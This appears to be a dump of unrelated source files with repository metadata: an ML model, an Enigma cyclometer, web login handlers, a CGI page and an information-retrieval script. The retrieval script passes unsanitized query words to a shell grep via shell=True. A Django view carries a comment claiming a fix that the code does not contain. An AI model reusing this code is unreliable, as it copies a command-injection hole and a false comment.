            native_opcode_names_by_opcode,
            max_cost,
            flags,
        )
        return cost, Program.to(ret)
NIL = Program.from_bytes(b"\x80")
|
[
"87711356+Olive-blockchain@users.noreply.github.com"
] |
87711356+Olive-blockchain@users.noreply.github.com
|
3d581b4a840d64ec73781edb5491e2a20ac0e61d
|
60221cc1f22bfb151c2307c7c470fe4203269e2f
|
/10-10-20/LongestVowelChain.py
|
73d7634808608bad0f4ca148b4e16ba092d93aca
|
[] |
no_license
|
christopherc1331/CodeChallenges
|
0372b34154849030dc0e7cd74f0dc94153551802
|
36ba3cad00590c914eb5a339c0fe04618d18aceb
|
refs/heads/main
| 2023-01-13T21:55:49.248348
| 2020-11-21T20:10:35
| 2020-11-21T20:10:35
| 302,963,021
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 305
|
py
|
def solve(s):
    """Return the length of the longest run of consecutive vowels in s.

    A string with no vowels (or the empty string) yields 0.
    """
    # The original kept a dict of vowels with unused zero values and
    # accumulated every run length in a list just to take its max;
    # a set plus a running maximum does the same work in O(1) extra space.
    vowels = frozenset("aeiou")
    best = 0
    current = 0
    for ch in s:
        if ch in vowels:
            current += 1
            if current > best:
                best = current
        else:
            current = 0
    return best
|
[
"christopherc1331@gmail.com"
] |
christopherc1331@gmail.com
|
35c6020ad2088012abb9e86e532fb6d67f24ff18
|
37b8c1d533f6407848d0f0ef9ac78ee4b206efd9
|
/backend_test/models/payload.py
|
e6b474368ab0e9f0b528cde75746b6593e78bccb
|
[] |
no_license
|
richoGtz23/backend_test
|
2c8579c935ae6076306a3bf2b1a4c2bdb517f45d
|
8a3bebdae7145f54ac73c29795169cbe4d6fc664
|
refs/heads/master
| 2023-04-18T01:20:52.449642
| 2021-04-29T21:39:28
| 2021-04-29T21:39:28
| 362,954,076
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 102
|
py
|
from dataclasses import dataclass
@dataclass
class Payload:
    """Simple response payload.

    Carries a status string plus a 'num_in_english' string — the field
    name suggests a number spelled out in English words; confirm against
    the producing endpoint.
    """
    status: str
    num_in_english: str
|
[
"richo@gavelytics.com"
] |
richo@gavelytics.com
|
be6fe54d524ead59fa1c27ff98cd92919e15d863
|
40b69f48b0aad6fb1fde23b41f34d000236b3136
|
/ppdet/modeling/architectures/rfp_centernet.py
|
15f29a867d13e9848138a3830a485ffd6a2db57d
|
[
"Apache-2.0"
] |
permissive
|
TrendingTechnology/AFSM
|
e88d36d757229dc1266a0ec62d61fd6e48d29649
|
54af2f072071779789ba0baa4e4270a1403fd0dd
|
refs/heads/master
| 2023-01-22T03:28:17.868009
| 2020-12-10T09:47:17
| 2020-12-10T09:47:17
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,006
|
py
|
# AUTHOR: Zehui Gong
# DATE: 2020/6/21
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from paddle import fluid
from paddle.fluid.param_attr import ParamAttr
from paddle.fluid.initializer import Xavier, Constant
from ppdet.core.workspace import register
from ppdet.utils.check import check_version
from .centernet import CenterNet
__all__ = ['RFPCenterNet']
class ASPP(object):
    """Atrous Spatial Pyramid Pooling block used by the recursive FPN.

    Four parallel conv branches — a 1x1 conv, two dilated 3x3 convs
    (dilation 3 and 6), and a 1x1 conv over globally average-pooled
    features — whose outputs are concatenated along the channel axis.
    """
    def __init__(self, out_channels):
        super(ASPP, self).__init__()
        # Branch i uses kernel_sizes[i], dilations[i] and paddinds[i];
        # each branch emits 'out_channels' channels.
        self.out_channels = out_channels
        self.kernel_sizes = [1, 3, 3, 1]
        self.dilations = [1, 3, 6, 1]
        self.paddinds = [0, 3, 6, 0]
        self.aspp_num = len(self.kernel_sizes)
    def __call__(self, x, name=''):
        # Global average pool to 1x1 for the image-level branch.
        avg_x = fluid.layers.adaptive_pool2d(x, 1, pool_type="avg", name=name + 'aspp_ada_gap')
        outs = []
        for idx in range(self.aspp_num):
            # The last branch consumes the pooled 1x1 map; all others use x.
            inp = avg_x if (idx == self.aspp_num - 1) else x
            out = fluid.layers.conv2d(
                inp,
                self.out_channels,
                filter_size=self.kernel_sizes[idx],
                stride=1,
                padding=self.paddinds[idx],
                dilation=self.dilations[idx],
                param_attr=ParamAttr(name=name + 'aspp_conv{}.w'.format(idx)),
                bias_attr=ParamAttr(initializer=Constant(0),
                                    name=name + 'aspp_conv{}.b'.format(idx)),
                act='relu',
                name=name + 'aspp_conv{}'.format(idx))
            outs.append(out)
        # Broadcast the pooled branch back to the spatial size of the others
        # before channel-wise concatenation.
        outs[-1] = fluid.layers.expand(outs[-1], [1, 1, outs[0].shape[2], outs[0].shape[3]])
        out = fluid.layers.concat(outs, axis=1)
        return out
@register
class RFPCenterNet(CenterNet):
    """Recursive feature pyramid. details in https://arxiv.org/abs/2006.02334.
    Args:
        single_scale (bool): a flag that represents whether use single scale feature (e.g., level3)
            or multi-scale feature fusion (fuse features across various resolutions) to predict
            the final heatmap and size.
    """
    def __init__(self,
                 backbone,
                 neck=None,
                 head='CenterHead',
                 rfp_steps=2,
                 fpn_levels=(),
                 stage_with_rfp=[3, 4, 5],
                 rfp_sharing=False,
                 num_classes=80,
                 single_scale=True):
        check_version('1.8.0')
        assert neck is not None, 'in recursive feature pyramid, you must have a fpn neck!'
        super(RFPCenterNet, self).__init__(
            backbone,
            neck,
            head,
            num_classes,
            single_scale)
        # Map each backbone stage index to its position in the FPN output
        # list (FPN outputs run from fpn_levels[1] down to fpn_levels[0]).
        fpnidx_list = list(range(fpn_levels[1], fpn_levels[0]-1, -1))
        self.stage2fpnidx = {stage: fpnidx_list.index(stage) for stage in stage_with_rfp}
        self.rfp_steps = rfp_steps
        self.rfp_sharing = rfp_sharing
        self.stage_with_rfp = stage_with_rfp
        self.rfp_aspp = ASPP(neck.num_chan // 4)
    def extract_feat(self, x):
        # NOTE(review): self.fuse_features is not defined in this class;
        # presumably inherited from CenterNet — confirm.
        input_w = x.shape[-1]
        # step 1: a plain backbone + FPN forward pass.
        self.backbone.prefix_name = ''
        body_feats = self.backbone(x)
        body_feats, _ = self.neck.get_output(body_feats)
        body_feats = tuple(body_feats.values())
        # feedback connection (recursive refinement): feed ASPP-transformed
        # FPN outputs back into the backbone for rfp_steps - 1 extra passes.
        for rfp_idx in range(self.rfp_steps - 1):
            rfp_feats = tuple(self.rfp_aspp(body_feats[self.stage2fpnidx[i]])
                              for i in range(2, 6) if i in self.stage_with_rfp)
            if self.rfp_sharing:  # sharing backbone parameters
                body_feats_idx = self.backbone(x, rfp_feats)
            else:
                # Separate parameters per recursion step, namespaced by prefix.
                self.backbone.prefix_name = 'rfp_step{}'.format(rfp_idx + 1)
                body_feats_idx = self.backbone(x, rfp_feats)
            body_feats_idx, _ = self.neck.get_output(body_feats_idx)
            body_feats_idx = tuple(body_feats_idx.values())
            body_feats_new = []
            # Per-level learned gate blends the refined features with the
            # previous pass (weight from rfp_weight, a sigmoid-activated conv).
            for ft_idx in range(len(body_feats_idx)):
                add_weight = self.rfp_weight(body_feats_idx[ft_idx])
                body_feats_new.append(add_weight * body_feats_idx[ft_idx] +
                                      (1-add_weight) * body_feats[ft_idx])
            body_feats = body_feats_new
        body_feats = self.fuse_features(body_feats, input_w)
        return body_feats
    def rfp_weight(self, feat, name=''):
        # 1x1 conv (zero-initialized) + sigmoid producing a per-pixel blend
        # weight in (0, 1); zero init makes the blend start at 0.5.
        add_weight = fluid.layers.conv2d(
            feat,
            1,
            filter_size=1,
            stride=1,
            padding=0,
            param_attr=ParamAttr(
                initializer=Constant(0),
                name=name + 'rfp_weight.w'),
            bias_attr=ParamAttr(
                initializer=Constant(0),
                name=name + 'rfp_weight.b'),
            name=name + 'rfp_weight')
        add_weight = fluid.layers.sigmoid(add_weight)
        return add_weight
|
[
"zehuigong@foxmail.com"
] |
zehuigong@foxmail.com
|
bdbb607631f4655a4262cb8fb9fa30bf330b8670
|
a0331cfd563fe7df25d47e6fc0fc30d2785b504e
|
/bin/cyclometer.py
|
305a84eb0d30517a83dc01fad4e6c7fef42bba8d
|
[] |
no_license
|
thorikawa/PyEnigma
|
d051c293e2909e000fbca2d60bb4b2684884a437
|
def3cfd7189dda3c4f30be764fa9ccfba7567c6e
|
refs/heads/master
| 2021-01-01T16:55:30.784125
| 2015-03-27T06:14:03
| 2015-03-27T06:14:03
| 30,911,768
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,456
|
py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Python 2 script: enumerate Enigma rotor orders and ground settings, and for
# each setting print a "characteristic" derived from cycle structures of the
# 6-letter doubled-indicator encryption (classic Rejewski-style analysis).
import pyenigma, string
from itertools import permutations, product
from unionfind import UnionFind
# Empty plugboard: characteristics are plugboard-independent.
plugboard = pyenigma.Plugboard('')
for order in permutations(range(3)):
    print order
    rotors = [pyenigma.ROTORS[order[0]], pyenigma.ROTORS[order[1]], pyenigma.ROTORS[order[2]]]
    enigma = pyenigma.Enigma(rotors, pyenigma.REFLECTOR_B, plugboard)
    # Try every 3-letter ground (window) setting.
    for ground in product(string.ascii_uppercase, repeat=3):
        # groundstr = ''.join(ground)
        # if groundstr != 'FUQ':
        #     continue
        # One union-find per indicator position pair (1&4, 2&5, 3&6).
        uf1 = UnionFind(list(string.ascii_uppercase))
        uf2 = UnionFind(list(string.ascii_uppercase))
        uf3 = UnionFind(list(string.ascii_uppercase))
        for c in string.ascii_uppercase:
            # Reset the machine, then encrypt the letter six times in a row.
            enigma.setWindowCharacters(ground)
            result = ''
            for x in range(6):
                result += enigma.encode(c)
            indices = [ord(x) - ord('A') for x in result]
            # Link positions i and i+3 -- the doubled-key permutations.
            uf1.union(indices[0], indices[3])
            uf2.union(indices[1], indices[4])
            uf3.union(indices[2], indices[5])
        # print uf1.dump()
        # print uf2.dump()
        # print uf3.dump()
        counts1 = uf1.counts()
        counts2 = uf2.counts()
        counts3 = uf3.counts()
        # char1 = [len(counts1), counts1[0]]
        # char2 = [len(counts2), counts2[0]]
        # char3 = [len(counts3), counts3[0]]
        # Characteristic = number of cycles followed by the cycle sizes.
        char1 = [len(counts1)] + counts1
        char2 = [len(counts2)] + counts2
        char3 = [len(counts3)] + counts3
        char = char1 + char2 + char3
        charstring = ' '.join([str(x) for x in char])
        print '%s %s' % (''.join(ground), charstring)
|
[
"horikawa.takahiro@gmail.com"
] |
horikawa.takahiro@gmail.com
|
956e59a1d186f7ae0f6f6ce9ba95e91bf7134649
|
dac996032dddd7f69de203c42eaf656dbc2419e3
|
/www/day7_handlers.py
|
e4a52714374aea6a17db24e4c38f3dcde5c63dcc
|
[] |
no_license
|
goushan33/First-python3-webapp
|
14116ce093001cba38bbb038b9bcd89c9483ddf8
|
70134eee96317c32e989b21c2788251d13d3e96e
|
refs/heads/master
| 2020-04-04T18:20:52.327584
| 2019-04-10T03:54:39
| 2019-04-10T03:54:39
| 156,159,976
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,394
|
py
|
import re
import logging
import time
import json
from day5_web_frame import get, post
from aiohttp import web
from day4_models import User, Comment, Blog, next_id
from day5_error_api import APIError,APIValueError
import hashlib
from day6_config import configs
import day6_config
import day3_orm
'''
@get('/')
async def index(request):
users =await User.findAll()
return {
'__template__': 'test.html',
'users': users
}
'''
@get('/')
async def index(request):
    """Render the blog index page with hard-coded sample blog entries."""
    cookie_str = request.cookies.get(COOKIE_NAME)
    print(cookie_str)  # NOTE(review): debug print left in; consider logging
    user = ''
    summary = 'used for test summary1'
    # Sample data only -- real blogs are not loaded from the database yet.
    blogs = [Blog(id='1', name='blog1', summary=summary, created_at=time.time() - 120),
             Blog(id='2', name='blog2', summary=summary, created_at=time.time() - 3600),
             Blog(id='3', name='blog3', summary=summary, created_at=time.time() - 7200)]
    if cookie_str:
        if 'deleted' in cookie_str:
            # A signed-out cookie is set to '-deleted-' (see signout()).
            user = ''
        else:
            user = await cookiestr2user(cookie_str)
    # NOTE(review): `user` is computed but never handed to the template
    # ('__user__' below is commented out) -- confirm whether this is intended.
    return {
        '__template__': 'blogs.html',
        'blogs': blogs,
        #'__user__': request.__user__
    }
@get('/api/users')
async def api_get_users():
    """Return all users, ordered by creation time, as {'users': [...]}.

    Fixed: the ORM method is `findAll` (used consistently elsewhere in this
    module, e.g. api_register_user and user_authentication); `find_all` would
    raise AttributeError at runtime. A no-op loop over the results was also
    removed.
    """
    users = await User.findAll(orderBy='created_at')
    return dict(users=users)
# Basic e-mail shape check used when registering a user.
_RE_EMAIL = re.compile(r'^[a-z0-9\.\-\_]+\@[a-z0-9\-\_]+(\.[a-z0-9\-\_]+){1,4}$')
# Client-side hashed password: exactly 40 lowercase hex chars (a SHA1 digest).
_RE_SHA1 = re.compile(r'^[0-9a-f]{40}$')
# Name of the session cookie set on register / sign-in.
COOKIE_NAME = 'awesession'
_COOKIE_KEY = configs.session.secret  # secret used to sign cookies; default is 'awesome'
@get('/register')
async def register():
    """Serve the registration page."""
    return {
        '__template__': 'register.html'
    }
def user2cookiestr(user, max_life):
    """Build a signed session cookie for `user`.
    Format: '<uid>-<expires>-<sha1(uid-passwd-expires-secret)>', where
    `expires` is the absolute expiry time, `max_life` seconds from now.
    """
    # Generate cookie str by user
    expires = str(int(time.time() + max_life))
    s = '%s-%s-%s-%s' % (user.id, user.passwd, expires, _COOKIE_KEY)
    L = [user.id, expires, hashlib.sha1(s.encode('utf-8')).hexdigest()]
    return '-'.join(L)
# Handle registration form submission.
@post('/api/user/register')
async def api_register_user(*, email, name, passwd):
    '''
    Register a new user; the e-mail address must be unique.
    The password arrives already SHA1-hashed (40 hex chars) from the client,
    so the server never sees the plaintext; the avatar URL is built from the
    gravatar service using the MD5 of the e-mail.
    '''
    if not name or not name.strip():
        raise APIValueError('name')
    if not email or not _RE_EMAIL.match(email):
        raise APIValueError('email')
    if not passwd or not _RE_SHA1.match(passwd):
        raise APIValueError('passwd')
    users = await User.findAll(email=email)
    if len(users) > 0:
        raise APIError('register:failed', 'email', 'Email is already in use.')
    uid = next_id()
    # Stored password hash is sha1('<name>:<client-hashed passwd>').
    sha1_passwd = '%s:%s' % (name, passwd)
    user = User(id=uid, name=name.strip(), email=email, passwd=hashlib.sha1(sha1_passwd.encode('utf-8')).hexdigest(), image='http://www.gravatar.com/avatar/%s?d=mm&s=120' % hashlib.md5(email.encode('utf-8')).hexdigest())
    await user.save()
    # make session cookie:
    r = web.Response()
    r.set_cookie(COOKIE_NAME, user2cookiestr(user, 86400), max_age=86400, httponly=True)  # 86400s = 24h
    user.passwd = '******'  # mask the password in the JSON response body
    r.content_type = 'application/json'
    r.body = json.dumps(user, ensure_ascii=False).encode('utf-8')
    return r
# Sign-in page.
@get('/signin')
async def signin():
    """Serve the sign-in page."""
    return {
        '__template__': 'signin.html'
    }
# Handle sign-in form submission.
@post('/api/user/authentication')
async def user_authentication(*, email, passwd):
    """Verify e-mail/password; on success set the session cookie and return
    the (password-masked) user as JSON."""
    if not email:
        raise APIValueError('email', 'Invalid email.')
    if not passwd:
        raise APIValueError('passwd', 'Invalid null password.')
    user = await User.findAll(email=email)
    if len(user) == 0:
        raise APIError('signin:failed', 'no such email exist')
    user = user[0]  # take the single matching row
    user = day6_config.toDict(user)  # plain dict -> attribute-access Dict
    # Recompute the stored hash from the submitted password and compare.
    input_passwd = '%s:%s' % (user.name, passwd)
    input_hash_passwd = hashlib.sha1(input_passwd.encode('utf-8')).hexdigest()
    db_passwd = user.passwd
    if input_hash_passwd != db_passwd:
        raise APIValueError('passwd', 'Invalid password.')
    # authenticate ok, set cookie:
    r = web.Response()
    r.set_cookie(COOKIE_NAME, user2cookiestr(user, 86400), max_age=86400, httponly=True)
    user.passwd = '******'
    r.content_type = 'application/json'
    r.body = json.dumps(user, ensure_ascii=False).encode('utf-8')
    return r
# Decode a session cookie back into the currently signed-in user.
async def cookiestr2user(cookiestr):
    """Parse and verify a cookie produced by user2cookiestr.
    Returns the User (with passwd masked) on success, None on any failure
    (malformed cookie, expired, unknown user, or bad signature).
    """
    if not cookiestr:
        return None
    try:
        L = cookiestr.split('-')
        if len(L) != 3:
            return None
        uid, expires, hashed_s = L
        if int(expires) < time.time():
            return None  # cookie expired
        user = await User.find(uid)  # look up by primary key
        if user is None:
            return None
        # Re-sign with the stored password hash and compare signatures.
        s = '%s-%s-%s-%s' % (uid, user.passwd, expires, _COOKIE_KEY)
        if hashed_s != hashlib.sha1(s.encode('utf-8')).hexdigest():
            logging.info('the hashed_s from cookie is invaild')
            return None
        user.passwd = '******'
        return user
    except Exception as e:
        logging.exception(e)
        return None
# Sign out: invalidate the session cookie and bounce back to the referer.
@get('/signout')
async def signout(request):
    """Overwrite the session cookie with '-deleted-' (recognized by index())
    and redirect to the referring page, or '/' if there is none."""
    referer = request.headers.get('Referer')
    r = web.HTTPFound(referer or '/')
    r.set_cookie(COOKIE_NAME, '-deleted-', max_age=0, httponly=True)
    logging.info('user signed out.')
    return r
|
[
"443568347@qq.com"
] |
443568347@qq.com
|
017f38ce5694539ccdeb3137e5e3432cbac2a6fc
|
5b5d8971b01daa6bc377cfecfbbceffc1ce8fc5a
|
/codex.py
|
c3ac791d2de1a423577d34132cf8b2e28fa29859
|
[] |
no_license
|
Arcanist13/LinearCode
|
63da0208db0b48d80a22f6787fd74b93c569bbf7
|
b760282a58144a7a2b9588d43749d75d0d9ce091
|
refs/heads/master
| 2021-01-22T09:09:07.792866
| 2013-03-19T01:11:52
| 2013-03-19T01:11:52
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 357
|
py
|
# Takes codex and converts to a transition factor
def LinExt(codex):
    """Convert a 7-character codex into a signed transition factor.

    codex[1] selects the sign ('a' -> positive, 's' -> negative); the
    characters at positions 2 and 5 are concatenated to form the magnitude.
    Returns the resulting int, or False when the length or the sign
    character is invalid.
    """
    chars = list(codex)
    if len(chars) != 7:
        return False
    sign_map = {'a': '', 's': '-'}
    if chars[1] not in sign_map:
        return False
    magnitude = '{}{}'.format(chars[2], chars[5])
    return int(sign_map[chars[1]] + magnitude)
|
[
"gmeredith15855@gmail.com"
] |
gmeredith15855@gmail.com
|
9280c1e0b22b6cfed9287cfd7cc90a191f92fe67
|
adca754d684b9d5b7d0cbabaeef004fb7bcdb7a2
|
/djangoproject/users/views.py
|
6fad46a6f610e0e973549b1f6a4992ca2f02a7fd
|
[] |
no_license
|
qehremanekber/djangoproject
|
d9d99daa0921b2fadc69a2c2a419b261a8ec9dc7
|
009d262d3f12b54b35660b252af1511c303f1605
|
refs/heads/master
| 2023-06-16T16:44:17.298658
| 2021-07-11T22:41:11
| 2021-07-11T22:41:11
| 383,126,752
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 953
|
py
|
from django.shortcuts import render, redirect
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.decorators import login_required
from django.contrib import messages
from .forms import UserRegisterForm, UserUpdateForm, ProfileUpdateForm
def register(request):
    """User sign-up view: create the account on a valid POST and redirect to
    login; otherwise render the (possibly bound, with errors) form."""
    if request.method == 'POST':
        form = UserRegisterForm(request.POST)
        if form.is_valid():
            form.save()
            username = form.cleaned_data.get('username')  # NOTE(review): unused; confirm whether needed
            messages.success(request, f'Your account has been created! You are now able to log in ')
            return redirect('login')
    else:
        form = UserRegisterForm()
    # Invalid POSTs fall through here with the bound form so errors display.
    return render(request, 'users/register.html', {'form': form})
@login_required
def profile(request):
    """Profile page: show the user- and profile-update forms.

    Fixed: the context dict built below was never passed to render(), so the
    template could not see 'u_form' / 'p_form'.
    """
    u_form = UserUpdateForm()
    p_form = ProfileUpdateForm()
    context = {
        'u_form': u_form,
        'p_form': p_form
    }
    return render(request, 'users/profile.html', context)
|
[
"74054688+Bakubus@users.noreply.github.com"
] |
74054688+Bakubus@users.noreply.github.com
|
f061077aa9a0451acba6d155088c01013954d4bd
|
889fbe235b4c1d8c2d5860e29fd307ba1196292d
|
/workers/models.py
|
4157b0761cc32ef302ceeabecb2791a2095b1d34
|
[] |
no_license
|
DanikNik/exam_sgn
|
4b20b8739b0141e441ee261fcdc0e64b94ee35a8
|
2a01a08d9912647091fec76e3da8aec6e6717e48
|
refs/heads/master
| 2020-04-15T20:52:17.844581
| 2019-01-10T07:22:53
| 2019-01-10T07:22:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 318
|
py
|
from django.db import models
# Create your models here.
class Worker(models.Model):
    """An employee record: three-part name, job position, and experience."""
    first_name = models.CharField(max_length=20)
    second_name = models.CharField(max_length=20)
    surname = models.CharField(max_length=20)
    position = models.CharField(max_length=50)
    # NOTE(review): presumably experience in years -- confirm the unit.
    experience = models.IntegerField()
|
[
"sway9009"
] |
sway9009
|
f3c3fa48c5fe2cedcbc0edc3f040e3dde77e03bd
|
52cea26360f52b403df343c18f0d63c97f51a4ce
|
/33Search_in_Rotated_Sorted_Array.py
|
c8772589bd4411864f4b1c459c4b9eb73bd0269a
|
[] |
no_license
|
wopeter/leetcode
|
2a5f0debd47438da469cb31509cae24618f633dc
|
ae3e459da5ad923db303ac5b36a5ec69c43be073
|
refs/heads/master
| 2021-04-06T01:59:46.070202
| 2018-11-30T16:14:16
| 2018-11-30T16:14:16
| 124,897,207
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,956
|
py
|
"""
NO 33.Search in Rotated Sorted Array
Description
Suppose an array sorted in ascending order is rotated at some pivot unknown to you beforehand.
(i.e., [0,1,2,4,5,6,7] might become [4,5,6,7,0,1,2]).
You are given a target value to search. If found in the array return its index, otherwise return -1.
You may assume no duplicate exists in the array.
Your algorithm's runtime complexity must be in the order of O(log n).
Example 1:
Input: nums = [4,5,6,7,0,1,2], target = 0
Output: 4
Example 2:
Input: nums = [4,5,6,7,0,1,2], target = 3
Output: -1
"""
class Solution:
    def search(self, nums, target):
        """Search `target` in a rotated ascending array; return its index or -1.

        Two-phase O(log n): first locate the rotation point (index of the
        smallest element), then run a plain binary search on whichever sorted
        half can contain `target`.

        Fixed: the original chose the second-phase range without looking at
        `target`, so values in the rotated tail were reported missing
        (e.g. search([4,5,6,7,0,1,2], 0) returned -1 instead of 4).

        :type nums: List[int]
        :type target: int
        :rtype: int
        """
        if not nums:
            return -1
        # Phase 1: smallest index whose value is < nums[0]
        # (== len(nums) when the array was not rotated).
        lo, hi = 0, len(nums)
        while lo < hi:
            mid = (lo + hi) // 2
            if nums[mid] >= nums[0]:
                lo = mid + 1
            else:
                hi = mid
        pivot = lo
        # Phase 2: pick the sorted half that could hold target.
        if pivot < len(nums) and target < nums[0]:
            left, right = pivot, len(nums) - 1
        else:
            left, right = 0, pivot - 1
        # Standard binary search inside the chosen sorted range.
        while left <= right:
            middle = (left + right) // 2
            if nums[middle] > target:
                right = middle - 1
            elif nums[middle] < target:
                left = middle + 1
            else:
                return middle
        return -1

    def search2(self, nums, target):
        """One-pass variant: at each step determine which half is sorted and
        whether `target` falls inside it."""
        left, right = 0, len(nums) - 1
        while left <= right:
            mid = (left + right) // 2
            if nums[mid] == target:
                return mid
            elif nums[mid] >= nums[left]:
                # Left half [left, mid] is sorted.
                if nums[left] <= target < nums[mid]:
                    right = mid - 1
                else:
                    left = mid + 1
            else:
                # Right half [mid, right] is sorted.
                if nums[mid] < target <= nums[right]:
                    left = mid + 1
                else:
                    right = mid - 1
        return -1
|
[
"pengtemail@163.com"
] |
pengtemail@163.com
|
849f9e649cd5ddd741d07deaa01706c6fb2a496b
|
0623e353e9b1f073b955549d8a9e6be746428e79
|
/hw9.cgi
|
94aa861b79b7697670a7f7737345762d5a1f473e
|
[] |
no_license
|
ChristianFMartin/I211
|
d186d63711c7fd501bf06d8b8f6739921fe9eb83
|
4c31fe9b8aaf805aa5b9f9aeea95ed83395f55d0
|
refs/heads/master
| 2020-04-20T10:52:35.870327
| 2019-02-02T06:27:04
| 2019-02-02T06:27:04
| 168,801,013
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 639
|
cgi
|
#! /usr/bin/env python3
# CGI handler: confirm a robot-delivery order and display the total cost.
import cgi
# CGI response header must precede any body output.
print('Content-type: text/html\n')
form = cgi.FieldStorage()
# Form fields with defaults: ordered item, its cost, and the delivery fee.
item = form.getfirst('item', 'unknown item')
cost = form.getfirst('cost', 0)
dev_m = form.getfirst('dev_m', 10)
# Total = item cost + delivery fee (form values arrive as strings).
total_cost = int(cost) + int(dev_m)
total_cost = str(total_cost)
html = """
<!doctype html>
<html>
<head><meta charset="utf-8">
<title>Robot Delivery System Confirmation</title></head>
<body>
<h1>Robot Delivery System Confirmation</h1>
<p>You have selected to have a <em>{0}</em> delivered by drone.</p>
<p>Your total comes to ${1}</p>
</body>
</html>"""
print(html.format(item,total_cost))
|
[
"noreply@github.com"
] |
ChristianFMartin.noreply@github.com
|
f73bfd18d81aa0b7817cee20e527dd988d063dc3
|
5740921ce1ba85d5a31e10b58028ff8f3184aff9
|
/proj2.py
|
8ac869089732087cbdd2691673f8d6f5f24fb152
|
[] |
no_license
|
mskobe/IR-Proj2
|
5db9323261438c968392ada168a508afec393896
|
46132aa2e1aaa89f7c9349c3806ac3e157c9f161
|
refs/heads/master
| 2020-05-20T04:55:47.928240
| 2013-11-12T22:23:23
| 2013-11-12T22:23:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,255
|
py
|
import subprocess
import requests
import re
global queries
def get_query():
    """Read TREC topic descriptions from 'desc.51-100.short' and return a
    list of parsed token lists, one per non-empty line."""
    f = open('desc.51-100.short', 'r')
    queries = []
    for line in f:
        # Drop surrounding spaces, trailing periods and the newline.
        line = line.strip(' .\n')
        if line == '':
            pass
        else:
            query = parse_query(line)
            queries.append(query)
    f.close()
    return queries
def parse_query(line):
    """Tokenize one topic line into lowercase search terms.

    The leading field (topic number) and the literal word 'Document' are
    dropped; every remaining token is stripped of surrounding ,"() punctuation
    and embedded periods, split on hyphens or apostrophes, and lowercased.
    """
    cleaned = []
    for token in line.split(' ')[1:]:
        if token == '' or token == 'Document':
            continue
        # Inlined punctuation cleanup (same rules as parse_helper).
        stripped = token.strip(',""()').replace('.', '')
        if '-' in token:
            cleaned.extend(piece.lower() for piece in stripped.split('-'))
        elif "'" in token:
            cleaned.extend(piece.lower() for piece in stripped.split("'"))
        else:
            cleaned.append(stripped.lower())
    return cleaned
def parse_helper(ele):
    """Strip surrounding ,"() punctuation and drop all embedded periods."""
    return ele.strip(',""()').replace('.', '')
def stopping(query):
    """Remove stopwords (one per line in 'stoplist.txt') from every parsed
    query. Mutates `query` in place and returns it."""
    f = open('stoplist.txt', 'r')
    stop_list = []
    for line in f:
        line = line.rstrip('\n')
        stop_list.append(line)
    # For each stopword, rebuild each query list without it.
    # NOTE(review): O(|stoplist| * |queries| * terms); a set membership test
    # would be far cheaper, but the behavior is kept as-is.
    for i in stop_list:
        for j in range(0, len(query)):
            temp_query = []
            for k in range(0, len(query[j])):
                if i == query[j][k]:
                    pass
                else:
                    temp_query.append(query[j][k])
            query[j] = temp_query
    f.close()
    return query
def stemming(query):
query_length = 0
#file_address = ' ~/Dropbox/homework/IR-PROJ2/stem-classes.lst'
file_address = 'stem-classes.lst'
for i in range(0, len(query)):
query_length += len(query[i])
for j in range(0, len(query[i])):
grep_cmd = 'grep -w ' + query[i][j] + file_address
process = subprocess.Popen(\
grep_cmd, stdout=subprocess.PIPE, shell=True)
temp = process.communicate()[0]
if temp != '':
stem = temp.split('|')
query[i][j] = stem[0].strip()
else:
pass
print query[i]
avg_query_len = float(query_length) / 25
print avg_query_len
return query, avg_query_len
def send_request(query, avg_query_len):
    """For each query, fetch per-term inverted lists from the Lemur CGI,
    accumulate Okapi-TF document scores, and print the ranked results.
    Every request URL is also logged to the file 'requests_url'."""
    f = open('requests_url', 'w')
    avg_doclen = get_avg_doclen(3)
    for i in range(0, len(query)):
        score = {}
        query_length = len(query[i])
        # NOTE(review): the term loop starts at 1, skipping the first term --
        # confirm this is intentional (parse_query already drops the topic id).
        for j in range(1, len(query[i])):
            #make_url = 'http://fiji4.ccs.neu.edu/~zerg/lemurcgi/lemur.cgi?d=3&g=p'
            make_url = 'http://10.0.0.176/~zerg/lemurcgi/lemur.cgi?d=3&g=p'
            make_url += '&v=' + query[i][j]
            f.write(make_url)
            f.write('\n')
            r = requests.get(make_url)
            html = r.text
            # Extract the page body between <BODY> and <HR>, then every
            # integer in it: first two are ctf and df, followed by
            # (docid, doclen, tf) triples.
            parsed_html = re.compile(r'.*?<BODY>(.*?)<HR>', re.DOTALL).match(html).group(1)
            numbers = re.compile(r'(\d+)', re.DOTALL).findall(parsed_html)
            #numbers = parse_html(html)
            ctf, df = float(numbers[0]), float(numbers[1])
            inverted_list = map(lambda i: (int(numbers[2 + 3*i]), \
                float(numbers[3 + 3*i]),\
                float(numbers[4 + 3*i]))\
                ,range(0, (len(numbers) - 2)/3))
            #print "ctf= %(ctf)f df= %(df)f" % {'ctf': ctf, 'df':df}
            # NOTE(review): cal_query_oktf receives the document tf, not a
            # query-side term count -- verify against the intended formula.
            for (docid,doclen,tf) in inverted_list:
                if docid in score:
                    score[docid] += cal_socre(doclen, tf, avg_doclen) * \
                        cal_query_oktf(query_length, tf, avg_query_len)
                else:
                    score[docid] = cal_socre(doclen, tf, avg_doclen) * \
                        cal_query_oktf(query_length, tf, avg_query_len)
        # Rank documents for this query by descending score and print.
        sorted_score = sorted(score.iteritems(), key=lambda d:d[1], reverse=True)
        print sorted_score
    f.close()
#def parse_html(html):
#parsed_html = re.compile(r'.*?<BODY>(.*?)<HR>', re.DOTALL).match(html).group(1)
#numbers = re.compile(r'(\d+)', re.DOTALL).findall(parsed_html)
#return numbers
def get_avg_doclen(database_num):
